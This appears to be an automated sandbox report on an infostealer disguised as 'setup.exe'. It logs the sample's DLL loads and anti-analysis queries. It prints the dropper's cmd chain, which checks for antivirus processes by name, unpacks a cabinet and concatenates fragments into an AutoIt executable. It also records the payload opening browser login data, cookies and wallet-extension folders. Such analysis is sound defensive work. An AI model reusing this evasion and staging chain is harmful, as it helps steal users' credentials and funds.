      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: iconcodecservice.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: setup.exeStatic file information: File size 83896395 > 1048576
      Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\224177\Benefits.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\224177\Benefits.comJump to dropped file
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.com TID: 6544Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224177Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224177\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224177Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E WellingtonJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tranny" Yale Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224177\Benefits.com + Photographer + Vacuum + Separate + Valium + Continuing + Training + Hours + Kissing + Accepts + Verde + Quotations 224177\Benefits.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Searches + ..\Coordinated + ..\Students + ..\Approve + ..\There + ..\Molecular + ..\Updated yJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\224177\Benefits.com Benefits.com yJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: Benefits.com, 0000000D.00000000.2127534390.0000000000933000.00000002.00000001.01000000.00000008.sdmp, Accepts.9.dr, Benefits.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
